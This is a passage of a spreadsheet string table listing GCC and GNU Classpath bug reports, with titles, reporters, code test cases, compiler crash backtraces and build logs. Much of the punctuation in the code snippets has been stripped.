   if (ft == FMT_F || ft == FMT_EN</t>
  </si>
  <si>
    <t>prw</t>
  </si>
  <si>
    <t>CLASSPATH-27888</t>
  </si>
  <si>
    <t>Arrays.binarySearch broken for large arrays</t>
  </si>
  <si>
    <t>Read this...
http://googleresearch.blogspot.com/2006/06/extra-extra-read-all-about-it-nearly.html
...then try this...
class Search {
  public static void main (String[] args)
    {
      byte[] b = new byte[1100000000]
      b[b.length - 1] = 1
      int index = java.util.Arrays.binarySearch(b (byte) 1)
      System.out.println (index =  + index)
    }
}
After a lot of swapping I get...
$ gij Search
Exception in thread main java.lang.ArrayIndexOutOfBoundsException: -1064671149
   at java.util.Arrays.binarySearch (libgcj.so.7)
   at Search.main (Search.java:6)</t>
  </si>
  <si>
    <t>GCC-32660</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE using __builtin_ia32_vec_ext_v2di()</t>
  </si>
  <si>
    <t>Attempting to compile the following function causes an ICE:
#include 
long foo(__m128i val)
    return __builtin_ia32_vec_ext_v2di(val 1)
}
Changing the call to any of the following compiles just fine:
__builtin_ia32_vec_ext_v2di(val 0)
__builtin_ia32_vec_ext_v4si(val 1)
__builtin_ia32_vec_ext_v8hi(val 1)</t>
  </si>
  <si>
    <t>GCC-58930</t>
  </si>
  <si>
    <t>[C++11] Bogus error: converting to ... from initializer list would use explicit constructor</t>
  </si>
  <si>
    <t>Google ref: b/11448857
This is somewhat similar to PR54835.
// ---
struct SampleModule
{
   explicit SampleModule (int)
}
template 
struct BaseHandler
{
#ifndef BUG
   BaseHandler ()
#endif
   SampleModule module_ { 0 }
}
BaseHandler a
// ---
Clang compiles either variant.
Trunk GCC (g++ (GCC) 4.9.0 20131028 (experimental)):
g++ -c -std=c++11 t.cc &amp;&amp; echo ok &amp;&amp; g++ -c -std=c++11 t.cc -DBUG
ok
t.cc: In constructor 'constexpr BaseHandler::BaseHandler()':
t.cc:7:8: error: converting to 'SampleModule' from initializer list would use explicit constructor 'SampleModule::SampleModule(int)'
 struct BaseHandler
       ^
t.cc: At global scope:
t.cc:15:18: note: synthesized method 'constexpr BaseHandler::BaseHandler()' first required here
 BaseHandler a
                 ^
Making BaseHandler a non-template class also makes the problem go away.</t>
  </si>
  <si>
    <t>GCC-66079</t>
  </si>
  <si>
    <t>[5 Regression] memory leak with source allocation in internal subprogram</t>
  </si>
  <si>
    <t>This leak is superficially similar to Bug 65925 which was reported against GCC 5.0 20150216.  The code below however exhibits no leak when compiled with the aforementioned version and therefore appears to expose a regression in GCC 6.0 20150503.
Also the code below is much simpler. Unlike the code in 65925 the code below uses no  polymorphism no type extension no function (only a subroutine with no arguments) only one explicit allocate and only one derived type.  Also the procedure that invokes allocate is called inside a block construct and no variables are declared in the main program scope.  
FYI wrapping the call newRealVec in a loop increases the reported leak by 4 bytes for every loop iteration.
Damian
$ cat source-allocation.f90 
  type subdata
    integer allocatable :: b
  endtype
  block 
    call newRealVec
  end block
contains
  subroutine newRealVec 
    type(subdata) allocatable :: d
    allocate(dsource=subdata()) ! definitely lost 
  end subroutine
end 
$ gfortran source-allocation.f90 
$ valgrind ./a.out
==6209== Memcheck a memory error detector
==6209== Copyright (C) 2002-2011 and GNU GPL'd by Julian Seward et al. 
==6209== Using Valgrind-3.7.0 and LibVEX rerun with -h for copyright info
==6209== Command: ./a.out
==6209== 
==6209== 
==6209== HEAP SUMMARY:
==6209==     in use at exit: 4 bytes in 1 blocks
==6209==   total heap usage: 27 allocs 26 frees 12718 bytes allocated
==6209== 
==6209== LEAK SUMMARY:
==6209==    definitely lost: 4 bytes in 1 blocks
==6209==    indirectly lost: 0 bytes in 0 blocks
==6209==      possibly lost: 0 bytes in 0 blocks
==6209==    still reachable: 0 bytes in 0 blocks
==6209==         suppressed: 0 bytes in 0 blocks
==6209== Rerun with --leak-check=full to see details of leaked memory
==6209== 
==6209== For counts of detected and suppressed errors rerun with: -v
==6209== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 2 from 2)
$ gfortran --version
GNU Fortran (GCC) 6.0.0 20150503 (experimental)
Copyright (C) 2015 Free Software Foundation Inc.</t>
  </si>
  <si>
    <t>GCC-44345</t>
  </si>
  <si>
    <t>ICE in fold_convert_loc</t>
  </si>
  <si>
    <t>The attached source provokes the summary:
      pointer p
      target q
      q(i)=i
      p=&gt;q(110)
      print *p
      end
Best regards
Vittorio Zecca</t>
  </si>
  <si>
    <t>GCC-8351</t>
  </si>
  <si>
    <t>3.3 20021024 (experimental) fails to bootstrap on cygwin</t>
  </si>
  <si>
    <t>The bootstrap of the main compilers completes but then
fails building libstdc++-v3.  The last lines read:
/home/Roger/GCC/clean/gcc/xgcc -shared-libgcc -B/home/Roger/GCC/clean/gcc/ -nost
dinc++ -L/home/Roger/GCC/clean/i686-pc-cygwin/libstdc++-v3/src -L/home/Roger/GCC
/clean/i686-pc-cygwin/libstdc++-v3/src/.libs -B/usr/local/i686-pc-cygwin/bin/ -B
/usr/local/i686-pc-cygwin/lib/ -isystem /usr/local/i686-pc-cygwin/include -I../.
./../../gcc/libstdc++-v3/../gcc -I../../../../gcc/libstdc++-v3/../include -I/hom
e/Roger/GCC/clean/i686-pc-cygwin/libstdc++-v3/include/i686-pc-cygwin -I/home/Rog
er/GCC/clean/i686-pc-cygwin/libstdc++-v3/include -I../../../../gcc/libstdc++-v3/
libsupc++ -g -O2 -fno-implicit-templates -Wall -Wno-format -W -Wwrite-strings -W
inline -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -g -
c ../../../../gcc/libstdc++-v3/libsupc++/pure.cc -o pure.o
cc1plus: warning: -ffunction-sections may affect debugging on some targets
In file included from /usr/include/unistd.h:8
                 from ../../../../gcc/libstdc++-v3/libsupc++/pure.cc:34:
../../../../gcc/include/getopt.h:115: error: declaration of C function `int
   getopt()' conflicts with
/usr/include/sys/unistd.h:125: error: previous declaration `int getopt(int
   char* const* const char*)' here
make[4]: *** [pure.lo] Error 1
make[4]: Leaving directory `/home/Roger/GCC/clean/i686-pc-cygwin/libstdc++-v3/li
bsupc++'
The problem is that the prototype for getopt in /usr/include/sys/unistd.h
doesn't match the one provided by libiberty's getopt.h.  I'm
not sure if this is then a libiberty problem (requiring a
change to getopt.h) a libstc++-v3 problem (requiring a change
to pure.cc) or a Makefile problem (for confusing the system
include paths).
Cygwin's unistd.h currently contains:
# define __UNISTD_GETOPT__
# include 
# undef __UNISTD_GETOPT__
but this isn't including the /usr/include/getopt.h that
it was expecting.
Release:
3.3 20021024 (experimental)
Environment:
i686-pc-cygwin
Current cygwin 1.3.14(0.62/3/2) CYGWIN_NT-5.0
[updated today] on Windows 2000 on AMD athlon
How-To-Repeat:
../gcc/configure
make bootstrap</t>
  </si>
  <si>
    <t>GCC-8245</t>
  </si>
  <si>
    <t>Crash in destructors on Solaris no __cxa_atexit present</t>
  </si>
  <si>
    <t>I am seeing many KDE applications crash when exiting due to 
destructors in shared libraries being called after the 
libraries have been unloaded (hence the code is no longer present).
It looks like __cxa_atexit would solve the problem but __cxa_atexit is not present at least for Solaris 2.7 therefore something else should be implemented on Solaris or a __cxa_atexit should be provided (perhapse libiberty?).
Release:
gcc 2.95.3 and 3.2
Environment:
Sun Sparc Solaris 2.7 in 32-bit mode
How-To-Repeat:
1. Compile KDE 3.0.3 with gcc 2.95.3 or 3.2
2. Run Konqueror or Kmail (other apps also have this problem)
3. Exit app</t>
  </si>
  <si>
    <t>GCC-58555</t>
  </si>
  <si>
    <t>[4.9 Regression] Floating point exception in want_inline_self_recursive_call_p</t>
  </si>
  <si>
    <t>Created attachment 30919
gzipped C++ source code
I just tried to compile package flamerobin-0.9.3-4.20130401snap with
gcc 4.9 trunk dated 20130925. It said
./src/metadata/root.cpp:375:1: internal compiler error: Floating point exception
 }
 ^
0xafbfff crash_signal
    ../../src/trunk/gcc/toplev.c:335
0x50ed95 want_inline_self_recursive_call_p
    ../../src/trunk/gcc/ipa-inline.c:699
0xf72320 inline_small_functions
    ../../src/trunk/gcc/ipa-inline.c:1756
0xf72320 ipa_inline
    ../../src/trunk/gcc/ipa-inline.c:2009
0xf72320 execute
    ../../src/trunk/gcc/ipa-inline.c:2379
Please submit a full bug report
with preprocessed source if appropriate.
Preprocessed source code attached. Flag -O3 required.
Checking the compiler source code the offending line is
      if (!max_count
      &amp;&amp; (edge-&gt;frequency * CGRAPH_FREQ_BASE / caller_freq
          &gt;= max_prob))
I speculate that caller_freq == 0 and someone has missed out
a belt'n'braces check for zero before making the division.</t>
  </si>
  <si>
    <t>GCC-34230</t>
  </si>
  <si>
    <t>Expressions of parameters evaluated with too high precision</t>
  </si>
  <si>
    <t>Found by FX. See
http://gcc.gnu.org/ml/fortran/2007-11/msg00208.html
 $ cat a.f90
   real parameter :: y = exp(log(huge(y))+20)
   real parameter :: x = log(y)
   print * x y
   end
 $ gfortran a.f90 -fno-range-check &amp;&amp; ./a.out
    108.72284           +Infinity
The problem is the following: gfortran does not do:
  y = INF
  x = log(y) = log(INF) = INF
but it does:
  y = exp(log(huge())+20) = INF
  x = log(exp(log(huge())+20)) = log(huge())+20 = 108.7
Calculating with higher precision to obtain y is ok (though one gets different results compared with the run-time evaluation but I expect that the differences are only minor. Having the correct precision from the beginning would be also ok.)
However I regard it as bug if for expressions using y not y but a variant with higher precision.</t>
  </si>
  <si>
    <t>GCC-29449</t>
  </si>
  <si>
    <t>OBJECT_FORMAT_ELF not defined for the AVR target</t>
  </si>
  <si>
    <t>The preprocessor token OBJECT_FORMAT_ELF is incorrectly not defined for the AVR target (AVR-GCC). The AVR target uses the ELF object format thus this token should be defined.
Without the token specifying the valid -ffunction-sections compiler switch causes AVR-GCC to incorrectly give the warning -ffunction-sections may affect debugging on some targets.</t>
  </si>
  <si>
    <t>dean_camera</t>
  </si>
  <si>
    <t>GCC-37412</t>
  </si>
  <si>
    <t>No error on repeated declaration</t>
  </si>
  <si>
    <t>The following program compiles OK with no message that st is being redefined.
function fun() result(st)
  character(2) st
  character(1) st
  st = '1'
end function fun</t>
  </si>
  <si>
    <t>jonasson</t>
  </si>
  <si>
    <t>GCC-14572</t>
  </si>
  <si>
    <t>System ClassLoader is not set according to java.system.class.loader property</t>
  </si>
  <si>
    <t>according to java/lang/ClassLoader.java documentation: (gcc 3.3.3)
   * [...] The system property
   * java.system.class.loader if defined is taken to be the
   * name of the class to use as the system class loader which must have
   * a public constructor which takes a ClassLoader as a parent otherwise this
   * uses gnu.java.lang.SystemClassLoader.
   *
   * Note that this is different from the bootstrap classloader that
   * actually loads all the real system classes (the bootstrap classloader
   * is the parent of the returned system classloader).
   *
sorry if that is already fixed in newer versions
i only had a quick look with the cvs front-end and there are many changes
but i did not see a fix</t>
  </si>
  <si>
    <t>karme</t>
  </si>
  <si>
    <t>GCC-31183</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in int_cst_value at tree.c:7684   with -O3 -ftree-loop-linear</t>
  </si>
  <si>
    <t>&gt; cat bug.cc
int buf[256 * 9]
void f() {
        for (int i = 0 i &lt; 256 ++i) {
                for (int j = 0 j &lt; 8 ++j) {
                        buf[j + 1] = 0
                }
        }
}
&gt; g++ -O3 -ftree-loop-linear bug.cc
bug.cc: In function 'void f()':
bug.cc:2: internal compiler error: in int_cst_value at tree.c:7684
I'm using SVN revision 122952</t>
  </si>
  <si>
    <t>GCC-57865</t>
  </si>
  <si>
    <t>Broken _save64gpr and _rest64gpr usage</t>
  </si>
  <si>
    <t>Created attachment 30483
Test case.
The 64-bit GPR save and restore sequence is broken and destroys the link register saved on the stack:
powerpc-eabi-gcc -mcpu=8540 -mspe -mabi=spe -mfloat-gprs=double -Os -S test.c
diff -u test-4.7.2.s test-4.8.1.s 
--- test-4.7.2.s        2013-07-09 13:09:56.418360402 +0200
+++ test-4.8.1.s        2013-07-09 13:31:59.097519823 +0200
@@ -67 +67 @@
 f:
        stwu 1-56(1)
        mflr 0
-       addi 111-88
+       addi 111-80
        stw 060(1)
        bl _save64gpr_29
        mr 293
@@ -1516 +1516 @@
        stw 624(1)
        bl g
        lwz 516(1)
+       lwz 624(1)
+       evmergelo 3134
        stw 38(1)
        stw 412(1)
        mr 329
-       lwz 624(1)
        mr 430
-       evldd 318(1)
        bl h
-       addi 111-88
+       addi 111-80
        efdctsiz 331
        b _rest64gpr_29_x
        .size   f .-f
-       .ident  GCC: (GNU) 4.7.2
+       .ident  GCC: (GNU) 4.8.1
        .gnu_attribute 4 2</t>
  </si>
  <si>
    <t>GCC-20885</t>
  </si>
  <si>
    <t>Expression or constant actual with INTENT(OUT or INOUT) dummy.INTENT(INOUT)</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
  INTEGER DIMENSION(22) :: D=RESHAPE((/1234/)(/22/))
  CALL TT(D10)
  write(6*) D
  CALL TT(D11)
  write(6*) D
CONTAINS
 RECURSIVE SUBROUTINE TT (DI)
  INTEGER DIMENSION(22) INTENT(INOUT) :: D
  INTEGER INTENT(INOUT) :: I
  IF (I&gt;0) CALL TT(TRANSPOSE(D)I-1)
 END SUBROUTINE
END</t>
  </si>
  <si>
    <t>GCC-59644</t>
  </si>
  <si>
    <t>[4.9 Regression] r206243 miscompiles Linux kernel</t>
  </si>
  <si>
    <t>Starting with r206243 the Linux kernel gets miscompiled.
It just hangs very early during boot (before first printk).</t>
  </si>
  <si>
    <t>GCC-22253</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE while compiling libjava/gnu/gcj/xlib/natWindow.cc</t>
  </si>
  <si>
    <t>I get the following ICE:
/Volumes/export/gcc/gcc-cvs/gcc/libjava/gnu/gcj/xlib/natWindow.cc: In member
function 'virtual void gnu::gcj::xlib::Window::setWMProtocols(JArray*)':
/Volumes/export/gcc/gcc-cvs/gcc/libjava/gnu/gcj/xlib/natWindow.cc:110: internal
compiler error: Bus error
gdb session looks like this:
Starting program: /Volumes/export/gcc/gcc-cvs/objdir/gcc/cc1plus -fpreprocessed
natWindow.ii -feliminate-unused-debug-symbols -fPIC -quiet -dumpbase
natWindow.cc -auxbase-strip gnu/gcj/xlib/.libs/lib_gnu_awt_xlib_la-natWindow.o
-g -O2 -Wswitch-enum -Wextra -Wall -version -fno-rtti -fnon-call-exceptions
-fdollars-in-identifiers -fno-common -o natWindow.s
GNU C++ version 4.1.0 20050630 (experimental) (powerpc-apple-darwin8.1.0)
        compiled by GNU C version 4.1.0 20050630 (experimental).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: de29724eb145ed5e30b8ec939d966d8a
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000030
bitmap_set_bit (head=0x2c bit=16) at
/Volumes/export/gcc/gcc-cvs/gcc/gcc/bitmap.c:427
427       if (head-&gt;current == 0
The config is this one but I have to try if it fails also with xlib only.
[wolfram:gcc/gcc-cvs/objdir] andreast% ./gcc/xgcc -v
Using built-in specs.
Target: powerpc-apple-darwin8.1.0
Configured with: /Volumes/export/gcc/gcc-cvs/gcc/configure
--prefix=/Volumes/export/gcc/gcc-cvs/testbin --enable-java-awt=gtkxlib
--enable-gtk-cairo --disable-checking --disable-multilib
--enable-languages=cc++java</t>
  </si>
  <si>
    <t>GCC-60341</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] ICE compiling Nonmem 6.2.0</t>
  </si>
  <si>
    <t>Internal compiler error when compiling with the command:
  gfortran -c -O MODELG.for
Note that the ICE does not occur with the following command:
  gfortran -c MODELG.for
which seems to indicate that the ICE has to do with optimization.
I reproduced this ICE with both MinGW gfortran 4.8.1 and MinGW-64 gfortran 4.8.2 on 64-bit Windows 7.
To reproduce save the two source code files in the same directory as MODELG.for includes file SIZES. These files are part of the Nonmem 6.2.0 source code.</t>
  </si>
  <si>
    <t>schapel</t>
  </si>
  <si>
    <t>GCC-42522</t>
  </si>
  <si>
    <t>(zero_extract:SI (mem:QI) ...) misoptimized</t>
  </si>
  <si>
    <t>Hi
This is a code from libavformat/flvdec.c:
static int flv_probe(AVProbeData *p)
{
    const uint8_t *d
    d = p-&gt;buf
    if (d[0] == 'F' &amp;&amp; d[1] == 'L' &amp;&amp; d[2] == 'V' &amp;&amp; d[3] 8) {
        return AVPROBE_SCORE_MAX
    }
    return 0
}
When I compile FFmpeg with -O2/-O3 options FFmpeg doesn't recognize FLV files (Unknown format) but when I use -O1 everything works correctly.
Here is asm output when I compile flvdec.c file with -O2:
_flv_probe:
	clr.l d0
	rts
	.even
and here when I use -O1:
_flv_probe:
	move.l 4(sp)a0
	move.l 4(a0)a0
	cmp.b #70(a0)
	jne L3
	cmp.b #761(a0)
	jne L4
	cmp.b #862(a0)
	jne L5
	cmp.b #43(a0)
	jhi L6
	tst.b 5(a0)
	jne L7
	move.l 5(a0)d0
	moveq #8d1
	cmp.l d0d1
	jcs L8
	clr.l d0
	rts
L3:
	clr.l d0
	rts
L4:
	clr.l d0
	rts
L5:
	clr.l d0
	rts
L6:
	clr.l d0
	rts
L7:
	clr.l d0
	rts
L8:
	moveq #100d0
	rts
	.even
I attache proprocessed files + asm output in the archive.</t>
  </si>
  <si>
    <t>GCC-31843</t>
  </si>
  <si>
    <t>-Wformat-nonliteral differs between gcc and g++</t>
  </si>
  <si>
    <t>$ gcc -dumpversion
4.1.1
$ g++ -dumpversion
4.1.1
$ gcc -Wall -Wformat-nonliteral format_nonliteral.c 
$ g++ -Wall -Wformat-nonliteral format_nonliteral.c 
format_nonliteral.c: In function â€˜int main(int char**)â€™:
format_nonliteral.c:10: warning: format not a string literal argument types not checked</t>
  </si>
  <si>
    <t>GCC-54488</t>
  </si>
  <si>
    <t>tree loop invariant motion uses an excessive amount of memory</t>
  </si>
  <si>
    <t>LIM works on the whole function gathering all memory accesses of all loops at
a time instead of working on individual loop nests.  For the testcase in
PR46590 this uses 1GB of memory.</t>
  </si>
  <si>
    <t>GCC-57644</t>
  </si>
  <si>
    <t>[C++1y] Cannot bind bitfield to lvalue reference</t>
  </si>
  <si>
    <t>$ g++-snapshot --version
g++-snapshot (Debian 20130603-1) 4.9.0 20130603 (experimental) [trunk revision 199603]
$ cat main.cpp 
struct foo {
    unsigned i: 32
}
int main()
{
    foo f {}
    return (f.i)
}
$ g++-snapshot -std=c++1y main.cpp 
main.cpp: In function 'int main()':
main.cpp:8:15: error: cannot bind bitfield 'f.foo::i' to 'unsigned int&amp;'
     return (f.i)
               ^
-----------
The code is accepted if either the parens are removed (i.e. just return f.i) or when using -std=c++11.</t>
  </si>
  <si>
    <t>GCC-14226</t>
  </si>
  <si>
    <t>[3.4] ICE in emit_move_insn for -mcpu=power4</t>
  </si>
  <si>
    <t>On ppc32 when compiling the short testcase with gcc -c -mcpu=power4  
it faults with: 
sendmsg.i: In function `f': 
sendmsg.i:4: internal compiler error: in emit_move_insn at expr.c:2776 
the testcase was extracted from libobjc: 
void 
f() 
{ 
  __builtin_apply ((void*)0 (void*)0 0) 
}</t>
  </si>
  <si>
    <t>GCC-71730</t>
  </si>
  <si>
    <t>[5/6/7 Regression] ICE when character length specification uses an undefined variable</t>
  </si>
  <si>
    <t>Hi
the following code raises an ICE. The error was seen with gfortran 5.3.0 and 6.1.0.
Cheers
$ cat ice.f90
subroutine foo
  implicit none
  character(len=bar) :: a
end subroutine foo
$ gfortran ice.f90
ice.f90:1:0:
 subroutine foo
internal compiler error: in gfc_typenode_for_spec at fortran/trans-types.c:1064
0x6e981b gfc_typenode_for_spec(gfc_typespec*)                                   
        ../../srcdir/gcc/fortran/trans-types.c:1064                             
0x6e9b0f gfc_sym_type(gfc_symbol*)                                              
        ../../srcdir/gcc/fortran/trans-types.c:2160
0x69cf4c gfc_get_symbol_decl(gfc_symbol*)
        ../../srcdir/gcc/fortran/trans-decl.c:1574
0x69f907 generate_local_decl
        ../../srcdir/gcc/fortran/trans-decl.c:5220
0x69fcde expr_decls
        ../../srcdir/gcc/fortran/trans-decl.c:5168
0x5ee249 gfc_traverse_expr(gfc_expr* gfc_symbol* bool (*)(gfc_expr* gfc_symbol* int*) int)
        ../../srcdir/gcc/fortran/expr.c:4148
0x69fc10 generate_expr_decls
        ../../srcdir/gcc/fortran/trans-decl.c:5175
0x69fc10 generate_dependency_declarations
        ../../srcdir/gcc/fortran/trans-decl.c:5190
0x69fc10 generate_local_decl
        ../../srcdir/gcc/fortran/trans-decl.c:5217
0x6686bb do_traverse_symtree
        ../../srcdir/gcc/fortran/symbol.c:3817
0x6a053a generate_local_vars
        ../../srcdir/gcc/fortran/trans-decl.c:5410
0x6a053a gfc_generate_function_code(gfc_namespace*)
        ../../srcdir/gcc/fortran/trans-decl.c:6089
0x639430 translate_all_program_units
        ../../srcdir/gcc/fortran/parse.c:5613
0x639430 gfc_parse_file()
        ../../srcdir/gcc/fortran/parse.c:5819
0x67a5c5 gfc_be_parse_file
        ../../srcdir/gcc/fortran/f95-lang.c:201
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/home/bardeau/Softs/gcc-6.1.0/libexec/gcc/x86_64-pc-linux-gnu/6.1.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../srcdir/configure --with-gmp=/home/bardeau/Softs --prefix=/home/bardeau/Softs/gcc-6.1.0 --enable-languages=cc++fortran
Thread model: posix
gcc version 6.1.0 (GCC)</t>
  </si>
  <si>
    <t>bardeau</t>
  </si>
  <si>
    <t>GCC-10374</t>
  </si>
  <si>
    <t>[3.4 regression] [cygwin] mainline broken for a loong time</t>
  </si>
  <si>
    <t>Mainline has been broken on cygwin for months now. Last time I was able to compile it was probably before Dec 2002. 
/bin/sh ../libtool --tag CXX --mode=compile /home/Administrator/gcc/mainline/out
/gcc/xgcc -shared-libgcc -B/home/Administrator/gcc/mainline/out/gcc/ -nostdinc++
  -L/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-v3/src -L/home
/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-v3/src/.libs -B/usr/loc
al/i686-pc-cygwin/bin/ -B/usr/local/i686-pc-cygwin/lib/ -isystem /usr/local/i686
-pc-cygwin/include -isystem /usr/local/i686-pc-cygwin/sys-include -nostdinc++ -I
/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-v3/include/i686-pc
-cygwin -I/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-v3/inclu
de -I../../../../gcc/libstdc++-v3/libsupc++  -I../../../../gcc/libstdc++-v3/libm
ath   -O2 -g -O2 -g -O2 -fno-implicit-templates  -Wall -Wno-format -W -Wwrite-st
rings -Winline  -fdiagnostics-show-location=once      -fimplicit-templates -c ..
/../../../gcc/libstdc++-v3/src/demangle.cc
/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-v3/include/bits/de
mangle.h: In instantiation of `bool __gnu_cxx::demangler::session::de
code_template_args(std::basic_string Allocator&gt;&amp;)
[with Allocator = std::allocator]':
/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-v3/include/bits/de
mangle.h:1670:   instantiated from `bool __gnu_cxx::demangler::session&lt;Allocator
&gt; ::decode_type_with_postfix(std::basic_string Allo
cator&gt;&amp; std::basic_string Allocator&gt;&amp; __gnu_cxx:
:demangler::qualifier_list*) [with Allocator = std::allocator]'
/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-v3/include/bits/de
mangle.h:315:   instantiated from `bool __gnu_cxx::demangler::session
::decode_type(std::basic_string Allocator&gt;&amp; __gnu
_cxx::demangler::qualifier_list*) [with Allocator = std::allocator&lt;ch
ar&gt;]'
../../../../gcc/libstdc++-v3/src/demangle.cc:162:   instantiated from here
/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-v3/include/bits/de
mangle.h:1186: internal compiler error: Segmentation
   fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I reported this on the Cygwin mailing list and got no answer.
Release:
mainline
Environment:
cygwin/x86
How-To-Repeat:
checkout configure make bootstrap</t>
  </si>
  <si>
    <t>GCC-31034</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in set_value_range at tree-vrp.c:267</t>
  </si>
  <si>
    <t>I get the following ICE with -O2:
(sid)2632:tbm@coconut: ~] /usr/lib/gcc-snapshot/bin/gcc -c -O1 potrace-trace.c
(sid)2633:tbm@coconut: ~] /usr/lib/gcc-snapshot/bin/gcc -c -O2 potrace-trace.c
potrace-trace.c: In function 'opticurve':
potrace-trace.c:35: internal compiler error: in set_value_range at tree-vrp.c:267
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-61151</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] ICE with lambda</t>
  </si>
  <si>
    <t>struct B
{
  void foo () {}
}
template 
struct A
{
  template  void bar ()
  B a
}
template 
template 
void
A::bar ()
{
  auto f = [this] () { auto g = [=] () { a.foo () } g () }
  f ()
}
int
main ()
{
  A a
  a.bar  ()
}
ICEs with -std=c++11 on the trunk and with 4.9 branch head worked with 4.9.0.
On the trunk the ICE started with r210017 supposedly on the 4.9 branch with r210018 (haven't verified the latter).</t>
  </si>
  <si>
    <t>GCC-50504</t>
  </si>
  <si>
    <t>g++ 4.5.2 -O2 with complex produces incorrect code on AMD64</t>
  </si>
  <si>
    <t>Created attachment 25353
g++ -O2 main.cpp and ./a.out should not produce all zero outputs. The correct outputs are when compiled without -O2 option
A simple program attached that just delays complex inputs (in a rather complicated manner is a simple version of the bug) when compiled with -O2 using g++ 4.5.2 on Ubuntu 11.04 produces incorrect outputs. The same code works fine without -O2 option. Also Works correctly with g++-4.4 -O2 as well.
Compiler details:
OLLECT_GCC=g++-4.5
COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.5.2/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.5.2-8ubuntu4' --with-bugurl=file:///usr/share/doc/gcc-4.5/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.5 --enable-shared --enable-multiarch --with-multiarch-defaults=x86_64-linux-gnu --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib/x86_64-linux-gnu --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.5 --libdir=/usr/lib/x86_64-linux-gnu --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-gold --enable-ld=default --with-plugin-ld=ld.gold --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu</t>
  </si>
  <si>
    <t>casubbu</t>
  </si>
  <si>
    <t>GCC-71702</t>
  </si>
  <si>
    <t>dr_group_sort_cmp violates transitivity required for qsort</t>
  </si>
  <si>
    <t>Created attachment 38793
minimized testcase
On the attached testcase with gcc-4.9.3 or gcc-5.3 with '-O3 -fno-strict-overflow' invocation of qsort with comparator dr_group_sort_cmp from vect_analyze_data_ref_accesses during SLP pass demonstrates that this comparator can lack transitivity: there is a triple of data references such that comparator indicates dr1 &gt; dr2 &amp;&amp; dr2 &gt; dr3 &amp;&amp; dr3 &gt; dr1.
I couldn't reproduce this with gcc-6 or trunk (but I don't know if it's actually fixed there).
On musl-hosted GCC this leads to an ICE on gcc_assert further below in vect_analyze_data_ref_accesses.  On Glibc-hosted GCC the resulting sort order is different so the assert doesn't trigger on this testcase.
It's possible to stop in gdb on the faulty invocation using a simple LD_PRELOAD validator (to be attached):
gcc -std=c99 -g -fPIC -shared qsortchk.so qsortchk.c
gdb -ex set env LD_PRELOAD=`pwd`/qsortchk.so --args \
  .../5.3.0/cc1 -O3 -fno-strict-overflow ssmin.c
On 5.3 the problematic dataref triple seems to be:
Creating dr for *_27
analyze_innermost: success.
        base_address: Lx_26(D) + _24 * 8
        offset from base address: 0
        constant offset from base address: 0
        step: 0
        aligned to: 128
        base_object: *_27
Creating dr for *_40
analyze_innermost: Applying pattern match.pd:49 generic-match.c:3223
success.
        base_address: Lx_26(D) + (sizetype) _34 * 8
        offset from base address: 0
        constant offset from base address: 8
        step: 0
        aligned to: 128
        base_object: *_40
Creating dr for *_31
analyze_innermost: Applying pattern match.pd:49 generic-match.c:3223
success.
        base_address: Lx_26(D) + (sizetype) _24 * 8
        offset from base address: 0
        constant offset from base address: 8
        step: 0
        aligned to: 128
        base_object: *_31</t>
  </si>
  <si>
    <t>GCC-27693</t>
  </si>
  <si>
    <t>[4.0 Regression] strange interaction with const and sizeof and variable declarations in g++-4.0</t>
  </si>
  <si>
    <t>I don't know how to describe this.  The compiler generates a warning in a very specific case.  See the very simple and small program below and the different cases where the type error occurs and doesn't occur.  I'm not a C++ expert but this seems whacky.  Note that this does not occur with gcc on any version.  It doesn't occur with earlier (g++-3.4) versions of g++.  It does occur in g++-4.1.  BTW the compileres I've tested in on are all from from a machine running up-to-date Debian 'test'.
cheers Mark
cd /home/mhayden/spool/
make -k 
g++-4.0 -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++javaf95objcadatreelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.0 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk-default --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre --enable-mpfr --disable-werror --with-tune=i686 --enable-checking=release i486-linux-gnu
Thread model: posix
